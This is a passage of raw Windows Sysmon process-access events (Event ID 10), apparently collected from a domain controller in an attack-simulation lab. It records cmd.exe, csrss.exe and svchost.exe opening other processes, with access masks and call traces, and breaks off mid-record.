{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2690,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1FA0-5F25-0000-0010FED40400}\r\nSourceProcessId: 4928\r\nSourceThreadId: 4932\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-001072D70400}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\msvcrt.dll+4ba7c|C:\\Windows\\system32\\cmd.exe+103c4|C:\\Windows\\system32\\cmd.exe+10910|C:\\Windows\\system32\\cmd.exe+c36d|C:\\Windows\\system32\\cmd.exe+8ad9|C:\\Windows\\system32\\cmd.exe+6fdd|C:\\Windows\\system32\\cmd.exe+11a9e|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1FA0-5F25-0000-0010FED40400}","SourceProcessId":"4928","SourceThreadId":"4932","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-001072D70400}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\msvcrt.dll+4ba7c|C:\\Windows\\system32\\cmd.exe+103c4|C:\\Windows\\system32\\cmd.exe+10910|C:\\Windows\\system32\\cmd.exe+c36d|C:\\Windows\\system32\\cmd.exe+8ad9|C:\\Windows\\system32\\cmd.exe+6fdd|C:\\Windows\\system32\\cmd.exe+11a9e|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2691,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-001072D70400}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-001072D70400}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2692,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2693,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2694,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2695,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2696,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2697,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2698,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 